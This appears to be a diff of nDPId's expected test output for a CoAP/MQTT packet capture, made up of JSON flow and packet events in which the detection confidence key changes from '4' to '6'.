-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1375090926676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375090926676,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwAfdD1AAs6gt3N0b3JhZ2X\/bXlyZXNvdXJjZQ=="} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1375090926735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375090926735,"pkt":"ACTop0mhuCfrprIvht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjPESgAfeP9gQc6gh3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1375090935026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":73,"pkt_l4_len":19,"thread_ts_msec":1375090935026,"pkt":"uCfrprIvACTop0mhht1gAAAAABMRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwATY+NAA86h\/215ZGF0YQ=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1375090935240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1375090935240,"pkt":"uCfrprIvACTop0mhht1gAAAAACYRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAmaNlAA5Uit3N0b3JhZ2UKbXlyZXNvdXJjZf9teWRhdGE="} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1375090935293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"thread_ts_msec":1375090935293,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjO24wAMxd1gRJUi"} -00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1455907243976} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 